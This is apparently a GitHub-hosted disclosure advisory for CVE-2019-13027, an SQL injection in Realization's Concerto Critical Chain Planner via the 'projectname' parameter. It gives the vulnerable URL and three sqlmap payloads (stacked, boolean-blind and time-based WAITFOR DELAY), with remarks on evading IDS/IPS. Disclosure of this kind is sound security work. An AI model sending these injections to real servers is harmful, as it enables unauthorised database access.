Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
61 lines (54 sloc) 1.92 KB

CVE-2019-13027

Details for disclosing CVE-2019-13027

Vendor contact timeline: 1st July 2019 -> No response, no email back.

4th July 2019 -> No response, no email back.

8th July 2019 -> Email sent, Github created.

11 July 2019 -> No Vendor response. Vuln disclosed.

[Vulnerability Type] SQL Injection [Affected Product Code Base] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Version: 5.10.8071 (Other versions on 5.x branch are probably affected. Cannot test with >other branchs)

[Affected Component] Realization Concerto Critical Chain Planner (aka CCPM) 5.10.8071 has some critical security Issues, being SQL Injection in at least in taskupdt/taskdetails.aspx webpage via the "projectname" parameter


[Attack Type] Remote

[Attack Vectors] Application has a lot of reflected XSS/CSRF (for example, in checklist/checklist) , but the tricky part is the SQL Injections. Some tampering is needed depending on SQL Server versión and/or IDS/IPS.

URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined

ProjectName (foo) must exist and be valid. Fuzz the rest of parameters (or use a real request). foo has also an XSS

Detected SQL (payloads From SQLMAP) Parameter: projectname (GET)

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: projectname=foo';WAITFOR DELAY '0:0:5'--

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: projectname=foo' AND 3676=3676-- 

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: projectname=foo' WAITFOR DELAY '0:0:5'-- 

[Vendor of Product] REALIZATION - https://www.realization.com/

You can’t perform that action at this time.